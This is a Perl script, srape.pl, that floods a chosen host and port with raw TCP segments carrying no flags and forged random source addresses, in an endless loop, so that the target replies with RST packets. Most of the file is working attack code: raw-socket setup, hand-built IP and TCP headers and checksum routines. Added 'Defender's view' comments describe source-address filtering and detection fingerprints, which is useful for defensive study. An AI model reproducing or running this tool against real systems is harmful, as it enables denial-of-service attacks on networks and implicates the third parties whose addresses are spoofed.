#!/usr/bin/perl
# srape.pl by eTech <eTech@ziplip.com>
# srape sends tcp with no flags set and causes the victim to reply with tcp/rst packets
# It seems more effective than a syn attack and harder to filter

# Top-level driver.  Exactly two arguments are required: a target host and
# a port; a port of 0 means "pick a fresh random destination port for every
# segment".  Nothing here is under `use strict`, so $ARGC, $dest_host,
# $dest_port, $src_host and $src_port are all package globals.
$ARGC=@ARGV;
print "srape.pl by eTech\n";
if ($ARGC !=2) {
 print "Syntax: $0 <target> <port>\n";
 print "if port = 0. random ports\n";
		exit;
}
# `use` is compile-time, so AF_INET etc. are available to ack() below even
# though the statement sits in the middle of the script.
use Socket;
$dest_host=$ARGV[0];
$dest_port=$ARGV[1];
print "\nAttacking $dest_host on port: $dest_port\n";
# Unbounded loop: one segment per iteration, no delay, no exit condition
# (the process runs until it is killed).  Every iteration forges a new
# random source -- first octet 1..230, remaining octets 0..254, source port
# 1..65535 -- so no two segments need share a source address.
#
# Defender's view: because the sources are forged, source-address
# validation at the network edge (BCP 38 / uRPF) is what stops this traffic
# leaving its origin; on the receiving side, TCP segments with no flags set
# arriving at a steady rate from many unrelated addresses (see srape()) is
# the pattern to alert on, and the RST replies land on whoever owns the
# forged address.
for (;;) {
my $rand1 = int(rand(230)) + 1;
my $rand2 = int(rand(255));
my $rand3 = int(rand(255));
my $rand4 = int(rand(255));
$src_host = $rand1 . "." . $rand2 . "." . $rand3 . "." . $rand4;
$src_port = int(rand 65535) +1;
# Port argument 0: re-roll the destination port (1..65535) each time.
if ($ARGV[1] == 0)	{
$dest_port = int(rand 65535) +1;
}

ack($dest_host,$dest_port,$src_host,$src_port);

}

# Resolve both endpoints, build one segment via srape() and write it to a
# raw socket with a hand-assembled IP header.
#
# Arguments: destination host (name or dotted quad), destination port,
# forged source host (dotted quad from the caller), source port.  Returns
# nothing useful; the return values of socket(), setsockopt() and send()
# are not examined, so failures are silent.
#
# Defender's view: sending with IP_HDRINCL needs raw-socket privilege
# (CAP_NET_RAW on Linux), which is why keeping that privilege away from
# untrusted accounts prevents this kind of source forgery at the host.
sub ack  {
	my ($dest_host,$dest_port,$src_host,$src_port) = @_;

	my ($PROTO_RAW) = 255;  # IPPROTO_RAW: kernel does not add a transport header
	my ($PROTO_IP) = 0;  # setsockopt level; IPPROTO_IP on Linux
	my ($IP_HDRINCL) = 1;  # option number; IP_HDRINCL on Linux (differs on BSD-derived systems)

	# Element 4 of gethostbyname()'s list is the packed 4-byte address.
	# Both names are overwritten with their packed form from here on.
	$dest_host = (gethostbyname($dest_host))[4];
	$src_host = (gethostbyname($src_host))[4];

	# Bareword filehandle S, re-created on every call and never closed.
	socket(S, AF_INET, SOCK_RAW, $PROTO_RAW);

	# Tell the kernel the buffer already starts with an IP header.
	setsockopt(S, $PROTO_IP, $IP_HDRINCL, 1);
		
		# $data is never assigned anywhere in this file (undef), and srape()
		# ignores its fifth argument anyway.
		my ($packet) = srape($src_host, $src_port, $dest_host, $dest_port, $data);
		# Hand-built sockaddr_in: family (native), port (network order),
		# 4-byte address, 8 bytes of zero padding.
		my ($dest) = pack('S n a4 x8', AF_INET, $dest_port, $dest_host);
		send (S,$packet,0, $dest);
	}

# Build one 40-byte IPv4 + TCP segment (20-byte IP header, 20-byte TCP
# header, no payload) whose TCP flag byte is entirely zero.
#
# Arguments: packed 4-byte source and destination addresses (as produced
# by gethostbyname in ack()), source and destination ports, and $data,
# which is accepted but never used.  Returns the raw header bytes.
#
# Defender's view: the fixed values chosen here -- zero flag byte, window
# 124, TTL 255, DF set, IP identification equal to the TCP source port --
# are the observable fingerprint of this generator and are what a
# detection rule for it would key on.
sub srape {
	my ($src_host, $src_port, $dest_host, $dest_port, $data) = @_;

	my $hdr_cksum = 0;  # IP header checksum field, left zero (see note at $hdr)
	my $zero = 0;  # reused for every "must be zero" field
	my $proto_tcp = 6;  # IPPROTO_TCP
	my ($tcplength) = 20;  # TCP header only, no payload
	my $syn = int(rand 65535) +1;  # random initial sequence number (1..65535)
	my $ack = 0;  # acknowledgement number
	my $tcp_4bit_hdrlen = "5";  # data offset: 5 words = 20 bytes
	my $tcp_4bit_reserved = 0;
	my $hdr_n_reserved = $tcp_4bit_hdrlen . $tcp_4bit_reserved;  # "50" -> 0x50 via H2
	# All six control bits cleared: this is the "no flags set" segment the
	# file header describes, which (per that comment) draws a RST from the
	# victim.  The two leading $zero digits fill the unused high bits.
	my $tcp_urg_bit = 0;  
	my $tcp_ack_bit = 0;  
	my $tcp_psh_bit = 0;  
	my $tcp_rst_bit = 0;  
	my $tcp_syn_bit = 0; 
	my $tcp_fin_bit = 0;  
	my $tcp_codebits = $zero . $zero . $tcp_urg_bit . $tcp_ack_bit . $tcp_psh_bit .
		$tcp_rst_bit . $tcp_syn_bit . $tcp_fin_bit;  # 8-char bit string for B8
	my $tcp_windowsize = 124;  # constant advertised window
	my $tcp_urgent_pointer = 0;  


	# TCP pseudo-header (src, dst, zero, protocol, TCP length) followed by
	# the 20-byte TCP header with its checksum field ($zero) cleared; this
	# 32-byte buffer is what checkfro() sums to get the TCP checksum.
	my ($pseudo_tcp) = pack ('a4 a4 C C
				n n n
				N N
				H2 B8
				n v n',
			$src_host,$dest_host,$zero,$proto_tcp,
			$tcplength,$src_port,$dest_port,
			$syn,$ack,
			$hdr_n_reserved,$tcp_codebits,
			$tcp_windowsize,$zero,$tcp_urgent_pointer);

	my ($tcp_chksum) = &checkfro($pseudo_tcp);


	my $ip_version = "4";  
	my $ip_hedlen = "5";  # 5 words = 20 bytes, no IP options
	my $ver_n_hlen = $ip_version . $ip_hedlen;  # "45" -> 0x45 via H2
	my $ip_tos = "0";  # packed with H2, so a single "0" nibble pads to 0x00
	my ($totlength) = $tcplength + 20;  # 40 bytes total
	my $ip_fragment_id = $src_port;  # IP identification reused from the TCP source port
	my $ip_3bit_flags = "010";  # reserved=0, DF=1, MF=0
	my $ip_13bit_fragoffset = "0";  
	my $ip_flags_n_frags = $ip_3bit_flags . $ip_13bit_fragoffset;  # "0100", right-padded by B16 -> 0x4000
	my $ip_ttl = 255;  
	

	# IP header followed by the real TCP header.  $hdr_cksum is 0: with
	# IP_HDRINCL the kernel normally fills in the IP header checksum, but
	# that is platform-dependent -- confirm for the host in question.  The
	# TCP checksum is packed with 'v' (little-endian); that only agrees
	# with checkfro()'s native-order 16-bit summation on a little-endian
	# host, which the script appears to assume.
	my ($hdr) = pack ('H2 H2 n n
		 	   B16 C2
			   n a4 a4
			   n n
			   N N
			   H2 B8
			   n v n',
		$ver_n_hlen, $ip_tos, $totlength, $ip_fragment_id,
		$ip_flags_n_frags,$ip_ttl, $proto_tcp,
		$hdr_cksum, $src_host, $dest_host,
		$src_port, $dest_port,
		$syn,$ack,
		$hdr_n_reserved,$tcp_codebits,
		$tcp_windowsize,$tcp_chksum,$tcp_urgent_pointer);

	return $hdr;
}

# One's-complement Internet checksum (RFC 1071 style) of the bytes in $msg.
#
# The message is summed as native-order 16-bit words; a trailing odd byte
# is added on its own; the carries are folded back into the low 16 bits
# and the result is complemented and masked to 16 bits.
#
# NOTE: the word count is length/2 without truncation, so an odd-length
# message produces a fractional repeat count in the unpack template.  The
# only caller in this file passes a 32-byte buffer, so that path is never
# taken here.
sub checkfro {
    my ($msg) = @_;

    my $len_msg   = length($msg);
    my $num_short = $len_msg / 2;

    my $chk = 0;
    $chk += $_ for unpack("S$num_short", $msg);

    if ($len_msg % 2) {
        $chk += unpack("C", substr($msg, $len_msg - 1, 1));
    }

    # Fold the carry bits back in, then complement.
    $chk = ($chk >> 16) + ($chk & 0xffff);
    return ~(($chk >> 16) + $chk) & 0xffff;
}



